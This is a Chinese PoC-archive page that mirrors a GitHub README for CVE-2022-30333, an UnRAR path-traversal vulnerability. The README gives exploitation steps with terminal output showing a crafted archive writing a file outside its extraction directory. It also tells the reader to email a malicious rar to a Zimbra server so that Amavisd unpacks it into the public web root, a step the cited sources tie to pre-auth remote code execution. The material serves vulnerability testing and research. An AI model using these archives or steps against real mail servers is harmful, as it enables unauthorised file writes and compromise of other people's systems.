支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%
立即捐款

POC详情: a466bbf77e0994a73365f10d75c757401eab6bb2

来源
https://github.com/TheL1ghtVn/CVE-2022-30333-PoC
关联漏洞
标题:UnRAR 路径遍历漏洞 (CVE-2022-30333)
描述:UnRAR是一个可解压rar后缀文件的命令。 UnRAR 6.12 之前版本存在安全漏洞,该漏洞源于允许在提取(也称为解包)操作期间目录遍历写入文件,如创建 ~/.ssh/authorized_keys 文件所示。
介绍
# CVE-2022-30333-POC 
**Sample file to test CVE-2022-30333**
- [Sample.rar](./sample.rar) : if you want to test on Linux. When you extract, it create **trav** in **../../tmp/traversed**. Please be sure that directory **../../tmp/traversed** exists before extracting Sample.rar

- [exp.rar](./exp.rar) : if you want to test on Zimbra Mail server. When you extract, it create **moo.txt** in */opt/zimbra/jetty\_base/webapps/zimbra/public/*. You can access this file at https://zimbra_mail_domain/public/moo.txt  
## EXPLOITATION STEPS
### Testing on Linux
```
mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"
```
### Testing on Zimbra
- Create an email and attach malicious rar file then send to Zimbra email address. This rar file will be extracted while being analyzed with Amavisd.
- The  moo.txt should be at: */opt/zimbra/jetty\_base/webapps/zimbra/public/moo.txt* or *https://zimbra_mail_domain/public/moo.txt*

## REFERENCES
1. [Vietnamese blog from DEV2SEC](https://dev2sec.tech/security/zimbra-pre-auth-rce/)
2. [English blog from Sonarsource](https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/)
3. Special thanks to **mrlihd** for helping me rebuild attack-chain in Zimbra
文件快照

 [4.0K]  /data/pocs/a466bbf77e0994a73365f10d75c757401eab6bb2
├── [ 172]  exp.rar
├── [2.0K]  README.md
└── [ 145]  sample.rar

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。